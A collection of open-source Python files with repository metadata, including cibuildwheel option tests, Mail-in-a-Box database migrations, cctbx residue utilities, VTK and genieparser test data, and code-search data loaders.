# scikit extra trees internally converts to np.float32 during all operations,
# so if float64 datatable, need to cast first, in case will be nan for float32
from h2oaicore.systemutils import update_precision
X = update_precision(X, data_type=np.float32, override_with_data_type=True, fixup_almost_numeric=True)
# Replace missing values with a value smaller than all observed values
if not hasattr(self, 'min') or not isinstance(self.min, dict):
self.min = dict()
for col in X.names:
XX = X[:, col]
if col not in self.min:
self.min[col] = XX.min1()
if self.min[col] is None or np.isnan(self.min[col]) or np.isinf(self.min[col]):
self.min[col] = -1e10
else:
self.min[col] -= 1
XX.replace([None, np.inf, -np.inf], self.min[col])
X[:, col] = XX
assert X[dt.isna(dt.f[col]), col].nrows == 0
return X
def get_basic_importances(self, X, y):
# Just get feature importance using basic model so at least something to consume by genetic algorithm
if isinstance(X, dt.Frame):
X = X.to_numpy()
elif isinstance(X, pd.DataFrame):
X = X.values
# not in self, just for importances regardless of real model behavior
standard_scaler = StandardScaler()
X = standard_scaler.fit_transform(X)
from sklearn.linear_model import Ridge # will be used to derive feature importances
feature_model = Ridge(alpha=1., random_state=self.random_state)
feature_model.fit(X, y)
return np.array(abs(feature_model.coef_))
def predict(self, X, **kwargs):
model_tuple, _, _, _ = self.get_model_properties()
if len(model_tuple) == 3:
model, standard_scaler, self.min = model_tuple
else:
# migration for old recipe version
model = model_tuple
standard_scaler = None
self.min = dict()
X = dt.Frame(X)
X = self.basic_impute(X)
X = X.to_numpy()
if standard_scaler is not None:
X = standard_scaler.transform(X)
pred_contribs = kwargs.get('pred_contribs', None)
output_margin = kwargs.get('output_margin', None)
if not pred_contribs:
if self.num_classes == 1:
preds = model.predict(X)
else:
preds = model.predict_proba(X)
# preds = (prob_pos - prob_pos.min()) / (prob_pos.max() - prob_pos.min())
return preds
else:
raise NotImplementedError("No Shapley for K-nearest model")
|
66949320d43d92f6833fc543e27980c27f7dd6e7
|
d87964cb5b12f542cd21f1ad7c6ed85b5325dc77
|
/unit_test/options_test.py
|
134db012ec43857be1fafa247f5fe18adc89c65e
|
[
"BSD-2-Clause"
] |
permissive
|
pypa/cibuildwheel
|
65ddc98e9933ad4c7d408966c06cf4156941b68c
|
ce71f445deee7ac0dabd1ee900d6672370e60478
|
refs/heads/main
| 2023-08-17T02:56:29.658243
| 2023-08-14T16:15:53
| 2023-08-14T16:15:53
| 85,508,223
| 884
| 136
|
NOASSERTION
| 2023-09-13T20:10:43
| 2017-03-19T20:59:00
|
Python
|
UTF-8
|
Python
| false
| false
| 8,105
|
py
|
options_test.py
|
from __future__ import annotations
import os
import platform as platform_module
import textwrap
from pathlib import Path
import pytest
from cibuildwheel.__main__ import get_build_identifiers, get_platform_module
from cibuildwheel.bashlex_eval import local_environment_executor
from cibuildwheel.environment import parse_environment
from cibuildwheel.options import (
CommandLineArguments,
Options,
_get_pinned_container_images,
)
PYPROJECT_1 = """
[tool.cibuildwheel]
build = ["cp38*", "cp37*"]
skip = ["*musllinux*"]
environment = {FOO="BAR"}
test-command = "pyproject"
manylinux-x86_64-image = "manylinux1"
environment-pass = ["EXAMPLE_ENV"]
[tool.cibuildwheel.macos]
test-requires = "else"
[[tool.cibuildwheel.overrides]]
select = "cp37*"
test-command = "pyproject-override"
manylinux-x86_64-image = "manylinux2014"
"""
def test_options_1(tmp_path, monkeypatch):
with tmp_path.joinpath("pyproject.toml").open("w") as f:
f.write(PYPROJECT_1)
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
monkeypatch.setattr(platform_module, "machine", lambda: "x86_64")
options = Options(platform="linux", command_line_arguments=args, env={})
module = get_platform_module("linux")
identifiers = get_build_identifiers(
platform_module=module,
build_selector=options.globals.build_selector,
architectures=options.globals.architectures,
)
override_display = """\
*: pyproject
cp37-manylinux_x86_64, cp37-manylinux_i686: pyproject-override"""
print(options.summary(identifiers))
assert override_display in options.summary(identifiers)
default_build_options = options.build_options(identifier=None)
assert default_build_options.environment == parse_environment('FOO="BAR"')
all_pinned_container_images = _get_pinned_container_images()
pinned_x86_64_container_image = all_pinned_container_images["x86_64"]
local = options.build_options("cp38-manylinux_x86_64")
assert local.manylinux_images is not None
assert local.test_command == "pyproject"
assert local.manylinux_images["x86_64"] == pinned_x86_64_container_image["manylinux1"]
local = options.build_options("cp37-manylinux_x86_64")
assert local.manylinux_images is not None
assert local.test_command == "pyproject-override"
assert local.manylinux_images["x86_64"] == pinned_x86_64_container_image["manylinux2014"]
def test_passthrough(tmp_path, monkeypatch):
with tmp_path.joinpath("pyproject.toml").open("w") as f:
f.write(PYPROJECT_1)
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
monkeypatch.setattr(platform_module, "machine", lambda: "x86_64")
options = Options(platform="linux", command_line_arguments=args, env={"EXAMPLE_ENV": "ONE"})
default_build_options = options.build_options(identifier=None)
assert default_build_options.environment.as_dictionary(prev_environment={}) == {
"FOO": "BAR",
"EXAMPLE_ENV": "ONE",
}
@pytest.mark.parametrize(
"env_var_value",
[
"normal value",
'"value wrapped in quotes"',
"an unclosed single-quote: '",
'an unclosed double-quote: "',
"string\nwith\ncarriage\nreturns\n",
"a trailing backslash \\",
],
)
def test_passthrough_evil(tmp_path, monkeypatch, env_var_value):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
monkeypatch.setattr(platform_module, "machine", lambda: "x86_64")
options = Options(
platform="linux",
command_line_arguments=args,
env={"CIBW_ENVIRONMENT_PASS_LINUX": "ENV_VAR", "ENV_VAR": env_var_value},
)
parsed_environment = options.build_options(identifier=None).environment
assert parsed_environment.as_dictionary(prev_environment={}) == {"ENV_VAR": env_var_value}
xfail_env_parse = pytest.mark.xfail(
raises=SystemExit, reason="until we can figure out the right way to quote these values"
)
@pytest.mark.parametrize(
"env_var_value",
[
"normal value",
pytest.param('"value wrapped in quotes"', marks=[xfail_env_parse]),
pytest.param('an unclosed double-quote: "', marks=[xfail_env_parse]),
"string\nwith\ncarriage\nreturns\n",
pytest.param("a trailing backslash \\", marks=[xfail_env_parse]),
],
)
def test_toml_environment_evil(tmp_path, env_var_value):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
tmp_path.joinpath("pyproject.toml").write_text(
textwrap.dedent(
f"""\
[tool.cibuildwheel.environment]
EXAMPLE='''{env_var_value}'''
"""
)
)
options = Options(platform="linux", command_line_arguments=args, env={})
parsed_environment = options.build_options(identifier=None).environment
assert parsed_environment.as_dictionary(prev_environment={}) == {"EXAMPLE": env_var_value}
@pytest.mark.parametrize(
("toml_assignment", "result_value"),
[
('TEST_VAR="simple_value"', "simple_value"),
# spaces
('TEST_VAR="simple value"', "simple value"),
# env var
('TEST_VAR="$PARAM"', "spam"),
('TEST_VAR="$PARAM $PARAM"', "spam spam"),
# env var extension
('TEST_VAR="before:$PARAM:after"', "before:spam:after"),
# env var extension with spaces
('TEST_VAR="before $PARAM after"', "before spam after"),
# literal $ - this test is just for reference, I'm not sure if this
# syntax will work if we change the TOML quoting behaviour
(r'TEST_VAR="before\\$after"', "before$after"),
],
)
def test_toml_environment_quoting(tmp_path: Path, toml_assignment, result_value):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
tmp_path.joinpath("pyproject.toml").write_text(
textwrap.dedent(
f"""\
[tool.cibuildwheel.environment]
{toml_assignment}
"""
)
)
options = Options(platform="linux", command_line_arguments=args, env={})
parsed_environment = options.build_options(identifier=None).environment
environment_values = parsed_environment.as_dictionary(
prev_environment={**os.environ, "PARAM": "spam"},
executor=local_environment_executor,
)
assert environment_values["TEST_VAR"] == result_value
@pytest.mark.parametrize(
("toml_assignment", "result_name", "result_create_args"),
[
(
'container-engine = "podman"',
"podman",
[],
),
(
'container-engine = {name = "podman"}',
"podman",
[],
),
(
'container-engine = "docker; create_args: --some-option"',
"docker",
["--some-option"],
),
(
'container-engine = {name = "docker", create-args = ["--some-option"]}',
"docker",
["--some-option"],
),
(
'container-engine = {name = "docker", create-args = ["--some-option", "value that contains spaces"]}',
"docker",
["--some-option", "value that contains spaces"],
),
(
'container-engine = {name = "docker", create-args = ["--some-option", "value;that;contains;semicolons"]}',
"docker",
["--some-option", "value;that;contains;semicolons"],
),
],
)
def test_container_engine_option(tmp_path: Path, toml_assignment, result_name, result_create_args):
args = CommandLineArguments.defaults()
args.package_dir = tmp_path
tmp_path.joinpath("pyproject.toml").write_text(
textwrap.dedent(
f"""\
[tool.cibuildwheel]
{toml_assignment}
"""
)
)
options = Options(platform="linux", command_line_arguments=args, env={})
parsed_container_engine = options.globals.container_engine
assert parsed_container_engine.name == result_name
assert parsed_container_engine.create_args == result_create_args
|
92882546e07f0a924811e0dc6506eb7c01a12eb1
|
5b6ba0f288b1e2ac236af846a9bf546a63228476
|
/iotbx/pdb/aa_utils.py
|
0f6ddb364b4f1c071a08bcb64ab31dab627e2447
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
cctbx/cctbx_project
|
5b547b416cadbdf95cca21dace9f54272a08d98a
|
7f4dfb6c873fd560920f697cbfd8a5ff6eed82fa
|
refs/heads/master
| 2023-08-17T17:44:05.077010
| 2023-08-16T22:40:22
| 2023-08-16T22:40:22
| 39,508,026
| 206
| 131
|
NOASSERTION
| 2023-09-14T17:12:55
| 2015-07-22T13:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 3,731
|
py
|
aa_utils.py
|
from __future__ import division, print_function
from iotbx.pdb import modified_aa_names
from iotbx.pdb.amino_acid_codes import three_letter_given_one_letter
from iotbx.pdb.amino_acid_codes import one_letter_given_three_letter
from mmtbx.chemical_components import get_atom_names, get_bond_pairs
def get_aa_parent(code):
one = modified_aa_names.lookup.get(code.upper(), False)
if not one: return None
return three_letter_given_one_letter.get(one, None)
def get_aa_children(code):
one = one_letter_given_three_letter.get(code, None)
if one is None: return None
if one not in modified_aa_names.lookup.values(): return None
rc=[]
for key, item in modified_aa_names.lookup.items():
if item==one: rc.append(key)
rc.sort()
return rc
def standard_polymerise(code):
names = get_atom_names(code, heavy_atom_only=True)
names = set(names)
return set(['N','CA','C','O']).issubset(names)
def compare_atom_names(child, parent):
c_names = set(get_atom_names(child))
p_names = get_atom_names(parent, heavy_atom_only=True)
p_names.remove('OXT')
return set(p_names).issubset(c_names)
def _is_specific_number_heavy_bonds(bonds, name, number, verbose=False):
n_bonds = 0
for bond in bonds:
if verbose: print(bond)
if 'OXT' in bond: continue
if name in bond:
n_bonds+=1
if verbose: print(n_bonds)
return n_bonds!=number
def is_n_terminal(bonds):
return _is_specific_number_heavy_bonds(bonds, 'N', 1)
def is_c_terminal(bonds):
return _is_specific_number_heavy_bonds(bonds, 'C', 2)
def is_ca_mod(bonds, n_bonds=3):
return _is_specific_number_heavy_bonds(bonds, 'CA', n_bonds)
def is_standard_bonding(bonds, include_cb=True):
standard = [('CA', 'N'), ('C', 'CA'), ('C', 'O')]
if include_cb:
standard.append(('CA', 'CB'))
return set(standard).issubset(set(bonds))
def is_not_standard_main_chain(code):
assert standard_polymerise(code)
bonds = get_bond_pairs(code, heavy_atom_only=True, use_tuple=True)
if is_n_terminal(bonds):
return 'N terminal'
elif is_c_terminal(bonds):
return 'C terminal'
elif is_ca_mod(bonds):
return 'CA mod'
elif not is_standard_bonding(bonds):
return 'bonding mod'
return False
def get_aa_type(code):
parent = get_aa_parent(code)
if not standard_polymerise(code):
return 'non-polymer'
exact_subset = True
if not compare_atom_names(code, parent):
exact_subset = False
standard_main_chain = True
if is_not_standard_main_chain(code):
standard_main_chain = False
return is_not_standard_main_chain(code)
return 'ok'
def get_useable_sorted_on_size(code):
rc = get_aa_children(code)
tmp = []
overall = {}
for code in rc:
aa_type = get_aa_type(code)
overall.setdefault(aa_type, [])
overall[aa_type].append(code)
if aa_type in ['ok']:
tmp.append(code)
def myFunc(e): return len(get_atom_names(e, heavy_atom_only=True))
tmp.sort(key=myFunc)
return tmp
def tst_types(code):
rc = get_aa_children(code)
overall = {}
for code in rc:
aa_type = get_aa_type(code)
overall.setdefault(aa_type, [])
overall[aa_type].append(code)
print(overall)
for key, item in overall.items():
print(key, item)
if __name__ == '__main__':
import os, sys
if len(sys.argv)>1:
aa_list = sys.argv[1:]
else:
aa_list = ['CYS', 'DAL', 'NWM', 'GLY']
for resname in aa_list:
rc = get_aa_parent(resname)
print(' Parent %s : %s' % (resname, rc))
rc = get_aa_children(resname)
print(' Children %s : %s' % (resname, rc))
print(get_useable_sorted_on_size(resname))
tst_types(resname)
continue
for code in rc:
print(code,get_aa_type(code))
# cmd = 'phenix.reel --chem %s' % code
# os.system(cmd)
|
94a8243e671a226fb4962454e5940072cb0505ae
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/junos/tests/ShowRouteAdvertisingProtocolDetail/cli/equal/golden_output_3_expected.py
|
db3a3ce812e230e6c33d5f8bf260b573341e71f0
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
golden_output_3_expected.py
|
expected_output = {
"route-information": {
"route-table": [
{
"active-route-count": "1",
"destination-count": "1",
"hidden-route-count": "0",
"holddown-route-count": "0",
"rt-entry": {
"active-tag": "*",
"as-path": "[1] I",
"bgp-group": {
"bgp-group-name": "eBGP_SUT-2",
"bgp-group-type": "External",
},
"flags": "Nexthop Change",
"med": "1",
"nh": {"to": "Self"},
"route-label": "17",
"rt-announced-count": "1",
"rt-destination": "10.36.3.3",
"rt-entry-count": "1",
"rt-prefix-length": "32",
},
"table-name": "inet.3",
"total-route-count": "1",
}
]
}
}
|
5c9d4095bc35186233f23337e5bde619e9a07456
|
820b6af9fd43b270749224bb278e5f714f655ac9
|
/IO/Geometry/Testing/Python/TestChacoReader.py
|
e099aefd963b87153c031c69185e1bb0e64e6e64
|
[
"BSD-3-Clause"
] |
permissive
|
Kitware/VTK
|
49dee7d4f83401efce8826f1759cd5d9caa281d1
|
dd4138e17f1ed5dfe6ef1eab0ff6643fdc07e271
|
refs/heads/master
| 2023-09-01T10:21:57.496189
| 2023-09-01T08:20:15
| 2023-09-01T08:21:05
| 631,615
| 2,253
| 1,243
|
NOASSERTION
| 2023-09-14T07:53:03
| 2010-04-27T15:12:58
|
C++
|
UTF-8
|
Python
| false
| false
| 1,505
|
py
|
TestChacoReader.py
|
#!/usr/bin/env python
from vtkmodules.vtkFiltersGeometry import vtkGeometryFilter
from vtkmodules.vtkIOGeometry import vtkChacoReader
from vtkmodules.vtkRenderingCore import (
vtkActor,
vtkPolyDataMapper,
vtkRenderWindow,
vtkRenderWindowInteractor,
vtkRenderer,
)
import vtkmodules.vtkInteractionStyle
import vtkmodules.vtkRenderingFreeType
import vtkmodules.vtkRenderingOpenGL2
from vtkmodules.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# read in a Chaco file
chReader = vtkChacoReader()
chReader.SetBaseName(VTK_DATA_ROOT + "/Data/vwgt")
chReader.SetGenerateGlobalElementIdArray(1)
chReader.SetGenerateGlobalNodeIdArray(1)
chReader.SetGenerateEdgeWeightArrays(1)
chReader.SetGenerateVertexWeightArrays(1)
geom = vtkGeometryFilter()
geom.SetInputConnection(chReader.GetOutputPort())
mapper = vtkPolyDataMapper()
mapper.SetInputConnection(geom.GetOutputPort())
mapper.SetColorModeToMapScalars()
mapper.SetScalarModeToUsePointFieldData()
mapper.SelectColorArray("VertexWeight1")
mapper.SetScalarRange(1, 5)
actor0 = vtkActor()
actor0.SetMapper(mapper)
# Create the RenderWindow, Renderer and interactor
#
ren1 = vtkRenderer()
renWin = vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actor to the renderer, set the background and size
#
ren1.AddActor(actor0)
ren1.SetBackground(0, 0, 0)
renWin.SetSize(300, 300)
renWin.SetMultiSamples(0)
iren.Initialize()
renWin.Render()
#iren.Start()
|
cbe9fce0c4be7c6d2b4f396337ea8fe946fa6e6d
|
b483fde5aa84f38a2fd61ecf1ef2e13bfb62d5d1
|
/setup/migrate.py
|
9065cf40fd7bcbab96809d29f755f8c9e6a20f0a
|
[
"CC0-1.0"
] |
permissive
|
mail-in-a-box/mailinabox
|
c6d05f9bb3d03106ab039cec3eb6699089858b15
|
e419b620347e7d3e4782466d540056a212d28ae1
|
refs/heads/main
| 2023-09-03T07:02:31.598535
| 2023-09-02T23:43:23
| 2023-09-02T23:46:24
| 12,271,469
| 10,188
| 1,757
|
CC0-1.0
| 2023-09-02T19:54:18
| 2013-08-21T13:56:50
|
Python
|
UTF-8
|
Python
| false
| false
| 10,770
|
py
|
migrate.py
|
#!/usr/bin/python3
# Migrates any file structures, database schemas, etc. between versions of Mail-in-a-Box.
# We have to be careful here that any dependencies are already installed in the previous
# version since this script runs before all other aspects of the setup script.
import sys, os, os.path, glob, re, shutil
sys.path.insert(0, 'management')
from utils import load_environment, save_environment, shell
def migration_1(env):
# Re-arrange where we store SSL certificates. There was a typo also.
def move_file(fn, domain_name_escaped, filename):
# Moves an SSL-related file into the right place.
fn1 = os.path.join( env["STORAGE_ROOT"], 'ssl', domain_name_escaped, file_type)
os.makedirs(os.path.dirname(fn1), exist_ok=True)
shutil.move(fn, fn1)
# Migrate the 'domains' directory.
for sslfn in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/domains/*' )):
fn = os.path.basename(sslfn)
m = re.match("(.*)_(certifiate.pem|cert_sign_req.csr|private_key.pem)$", fn)
if m:
# get the new name for the file
domain_name, file_type = m.groups()
if file_type == "certifiate.pem": file_type = "ssl_certificate.pem" # typo
if file_type == "cert_sign_req.csr": file_type = "certificate_signing_request.csr" # nicer
move_file(sslfn, domain_name, file_type)
# Move the old domains directory if it is now empty.
try:
os.rmdir(os.path.join( env["STORAGE_ROOT"], 'ssl/domains'))
except:
pass
def migration_2(env):
# Delete the .dovecot_sieve script everywhere. This was formerly a copy of our spam -> Spam
# script. We now install it as a global script, and we use managesieve, so the old file is
# irrelevant. Also delete the compiled binary form.
for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.sieve')):
os.unlink(fn)
for fn in glob.glob(os.path.join(env["STORAGE_ROOT"], 'mail/mailboxes/*/*/.dovecot.svbin')):
os.unlink(fn)
def migration_3(env):
# Move the migration ID from /etc/mailinabox.conf to $STORAGE_ROOT/mailinabox.version
# so that the ID stays with the data files that it describes the format of. The writing
# of the file will be handled by the main function.
pass
def migration_4(env):
# Add a new column to the mail users table where we can store administrative privileges.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "ALTER TABLE users ADD privileges TEXT NOT NULL DEFAULT ''"])
def migration_5(env):
# The secret key for encrypting backups was world readable. Fix here.
os.chmod(os.path.join(env["STORAGE_ROOT"], 'backup/secret_key.txt'), 0o600)
def migration_6(env):
# We now will generate multiple DNSSEC keys for different algorithms, since TLDs may
# not support them all. .email only supports RSA/SHA-256. Rename the keys.conf file
# to be algorithm-specific.
basepath = os.path.join(env["STORAGE_ROOT"], 'dns/dnssec')
shutil.move(os.path.join(basepath, 'keys.conf'), os.path.join(basepath, 'RSASHA1-NSEC3-SHA1.conf'))
def migration_7(env):
# I previously wanted domain names to be stored in Unicode in the database. Now I want them
# to be in IDNA. Affects aliases only.
import sqlite3
conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/users.sqlite"))
# Get existing alias source addresses.
c = conn.cursor()
c.execute('SELECT source FROM aliases')
aliases = [ row[0] for row in c.fetchall() ]
# Update to IDNA-encoded domains.
for email in aliases:
try:
localpart, domainpart = email.split("@")
domainpart = domainpart.encode("idna").decode("ascii")
newemail = localpart + "@" + domainpart
if newemail != email:
c = conn.cursor()
c.execute("UPDATE aliases SET source=? WHERE source=?", (newemail, email))
if c.rowcount != 1: raise ValueError("Alias not found.")
print("Updated alias", email, "to", newemail)
except Exception as e:
print("Error updating IDNA alias", email, e)
# Save.
conn.commit()
def migration_8(env):
# Delete DKIM keys. We had generated 1024-bit DKIM keys.
# By deleting the key file we'll automatically generate
# a new key, which will be 2048 bits.
os.unlink(os.path.join(env['STORAGE_ROOT'], 'mail/dkim/mail.private'))
def migration_9(env):
# Add a column to the aliases table to store permitted_senders,
# which is a list of user account email addresses that are
# permitted to send mail using this alias instead of their own
# address. This was motivated by the addition of #427 ("Reject
# outgoing mail if FROM does not match Login") - which introduced
# the notion of outbound permitted-senders.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "ALTER TABLE aliases ADD permitted_senders TEXT"])
def migration_10(env):
# Clean up the SSL certificates directory.
# Move the primary certificate to a new name and then
# symlink it to the system certificate path.
import datetime
system_certificate = os.path.join(env["STORAGE_ROOT"], 'ssl/ssl_certificate.pem')
if not os.path.islink(system_certificate): # not already a symlink
new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', env['PRIMARY_HOSTNAME'] + "-" + datetime.datetime.now().date().isoformat().replace("-", "") + ".pem")
print("Renamed", system_certificate, "to", new_path, "and created a symlink for the original location.")
shutil.move(system_certificate, new_path)
os.symlink(new_path, system_certificate)
# Flatten the directory structure. For any directory
# that contains a single file named ssl_certificate.pem,
# move the file out and name it the same as the directory,
# and remove the directory.
for sslcert in glob.glob(os.path.join( env["STORAGE_ROOT"], 'ssl/*/ssl_certificate.pem' )):
d = os.path.dirname(sslcert)
if len(os.listdir(d)) == 1:
# This certificate is the only file in that directory.
newname = os.path.join(env["STORAGE_ROOT"], 'ssl', os.path.basename(d) + '.pem')
if not os.path.exists(newname):
shutil.move(sslcert, newname)
os.rmdir(d)
def migration_11(env):
# Archive the old Let's Encrypt account directory managed by free_tls_certificates
# because we'll use that path now for the directory managed by certbot.
try:
old_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt')
new_path = os.path.join(env["STORAGE_ROOT"], 'ssl', 'lets_encrypt-old')
shutil.move(old_path, new_path)
except:
# meh
pass
def migration_12(env):
# Upgrading to Carddav Roundcube plugin to version 3+, it requires the carddav_*
# tables to be dropped.
# Checking that the roundcube database already exists.
if os.path.exists(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite")):
import sqlite3
conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite"))
c = conn.cursor()
# Get a list of all the tables that begin with 'carddav_'
c.execute("SELECT name FROM sqlite_master WHERE type = ? AND name LIKE ?", ('table', 'carddav_%'))
carddav_tables = c.fetchall()
# If there were tables that begin with 'carddav_', drop them
if carddav_tables:
for table in carddav_tables:
try:
table = table[0]
c = conn.cursor()
dropcmd = "DROP TABLE %s" % table
c.execute(dropcmd)
except:
print("Failed to drop table", table, e)
# Save.
conn.commit()
conn.close()
# Delete all sessions, requring users to login again to recreate carddav_*
# databases
conn = sqlite3.connect(os.path.join(env["STORAGE_ROOT"], "mail/roundcube/roundcube.sqlite"))
c = conn.cursor()
c.execute("delete from session;")
conn.commit()
conn.close()
def migration_13(env):
# Add the "mfa" table for configuring MFA for login to the control panel.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "CREATE TABLE mfa (id INTEGER PRIMARY KEY AUTOINCREMENT, user_id INTEGER NOT NULL, type TEXT NOT NULL, secret TEXT NOT NULL, mru_token TEXT, label TEXT, FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE);"])
def migration_14(env):
# Add the "auto_aliases" table.
db = os.path.join(env["STORAGE_ROOT"], 'mail/users.sqlite')
shell("check_call", ["sqlite3", db, "CREATE TABLE auto_aliases (id INTEGER PRIMARY KEY AUTOINCREMENT, source TEXT NOT NULL UNIQUE, destination TEXT NOT NULL, permitted_senders TEXT);"])
###########################################################
def get_current_migration():
ver = 0
while True:
next_ver = (ver + 1)
migration_func = globals().get("migration_%d" % next_ver)
if not migration_func:
return ver
ver = next_ver
def run_migrations():
if not os.access("/etc/mailinabox.conf", os.W_OK, effective_ids=True):
print("This script must be run as root.", file=sys.stderr)
sys.exit(1)
env = load_environment()
migration_id_file = os.path.join(env['STORAGE_ROOT'], 'mailinabox.version')
migration_id = None
if os.path.exists(migration_id_file):
with open(migration_id_file) as f:
migration_id = f.read().strip();
if migration_id is None:
# Load the legacy location of the migration ID. We'll drop support
# for this eventually.
migration_id = env.get("MIGRATIONID")
if migration_id is None:
print()
print("%s file doesn't exists. Skipping migration..." % (migration_id_file,))
return
ourver = int(migration_id)
while True:
next_ver = (ourver + 1)
migration_func = globals().get("migration_%d" % next_ver)
if not migration_func:
# No more migrations to run.
break
print()
print("Running migration to Mail-in-a-Box #%d..." % next_ver)
try:
migration_func(env)
except Exception as e:
print()
print("Error running the migration script:")
print()
print(e)
print()
print("Your system may be in an inconsistent state now. We're terribly sorry. A re-install from a backup might be the best way to continue.")
sys.exit(1)
ourver = next_ver
# Write out our current version now. Do this sooner rather than later
# in case of any problems.
with open(migration_id_file, "w") as f:
f.write(str(ourver) + "\n")
# Delete the legacy location of this field.
if "MIGRATIONID" in env:
del env["MIGRATIONID"]
save_environment(env)
# iterate and try next version...
if __name__ == "__main__":
if sys.argv[-1] == "--current":
# Return the number of the highest migration.
print(str(get_current_migration()))
elif sys.argv[-1] == "--migrate":
# Perform migrations.
run_migrations()
|
8202722a079e2d2ce790d7cd027f7f517c8d3475
|
81c66d2c2910553a97f1229a924b95a3c94e77aa
|
/keras/data_loader.py
|
802c66f6d6caf2b2527f2545210ad59f4f57fa8a
|
[
"MIT"
] |
permissive
|
guxd/deep-code-search
|
66033a13d405bd8660566a2afbe662f448fb0bf0
|
06c9de63d97308b5b0adcb20f38402e5d29c8704
|
refs/heads/master
| 2022-05-27T12:57:05.186200
| 2022-05-26T14:32:51
| 2022-05-26T14:32:51
| 121,241,775
| 290
| 98
|
MIT
| 2021-04-11T03:25:44
| 2018-02-12T12:04:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,442
|
py
|
data_loader.py
|
import pickle
import codecs
import tables
import numpy as np
from tqdm import tqdm
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO, format="%(asctime)s: %(name)s: %(levelname)s: %(message)s")
def load_pickle(filename):
return pickle.load(open(filename, 'rb'))
##### Data Set #####
def load_codebase(path, chunk_size):
"""load codebase
codefile: h5 file that stores raw code
"""
logger.info('Loading codebase (chunk size={})..'.format(chunk_size))
codebase=[]
#codes=codecs.open(self.path+self.data_params['use_codebase']).readlines()
codes=codecs.open(path, encoding='utf8',errors='replace').readlines()
#use codecs to read in case of encoding problem
for i in tqdm(range(0,len(codes), chunk_size)):
codebase.append(codes[i:i+chunk_size])
return codebase
### Results Data ###
def load_code_reprs(path, chunk_size):
logger.debug(f'Loading code vectors (chunk size={chunk_size})..')
"""reads vectors (2D numpy array) from a hdf5 file"""
codereprs=[]
h5f = tables.open_file(path)
vecs = h5f.root.vecs
for i in range(0, len(vecs), chunk_size):
codereprs.append(vecs[i: i+ chunk_size])
h5f.close()
return codereprs
def save_code_reprs(vecs, path):
npvecs=np.array(vecs)
fvec = tables.open_file(path, 'w')
atom = tables.Atom.from_dtype(npvecs.dtype)
filters = tables.Filters(complib='blosc', complevel=5)
ds = fvec.create_carray(fvec.root, 'vecs', atom, npvecs.shape,filters=filters)
ds[:] = npvecs
fvec.close()
def load_hdf5(vecfile, start_offset, chunk_size):
"""reads training sentences(list of int array) from a hdf5 file"""
table = tables.open_file(vecfile)
data = table.get_node('/phrases')[:].astype(np.int)
index = table.get_node('/indices')[:]
data_len = index.shape[0]
if chunk_size==-1:#if chunk_size is set to -1, then, load all data
chunk_size=data_len
start_offset = start_offset%data_len
logger.debug("{} entries".format(data_len))
logger.debug("starting from offset {} to {}".format(start_offset,start_offset+chunk_size))
sents = []
for offset in tqdm(range(start_offset, start_offset+chunk_size)):
offset = offset%data_len
len, pos = index[offset]['length'], index[offset]['pos']
sents.append(data[pos:pos + len])
table.close()
return sents
|
354710d8c39bd1c07db32aac549138d3750fd565
|
54292bb222c6525217458e92ddacfc4e2635b83e
|
/python/phonenumbers/data/region_EE.py
|
18227bc3fad728e5f8227ae1cf6cbfef6cdb93b0
|
[
"Apache-2.0"
] |
permissive
|
daviddrysdale/python-phonenumbers
|
0d69b48033d1464c0a6c358274062f1db2ee8c4a
|
2f06ef6db2ca83f3856fbb8019a0c665f5971b13
|
refs/heads/dev
| 2023-08-31T09:37:20.570690
| 2023-08-22T05:18:22
| 2023-08-22T05:18:22
| 1,643,611
| 2,944
| 406
|
Apache-2.0
| 2023-08-08T06:49:07
| 2011-04-21T03:06:38
|
Python
|
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
region_EE.py
|
"""Auto-generated file, do not edit by hand. EE metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_EE = PhoneMetadata(id='EE', country_code=372, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='8\\d{9}|[4578]\\d{7}|(?:[3-8]\\d|90)\\d{5}', possible_length=(7, 8, 10)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:3[23589]|4[3-8]|6\\d|7[1-9]|88)\\d{5}', example_number='3212345', possible_length=(7,)),
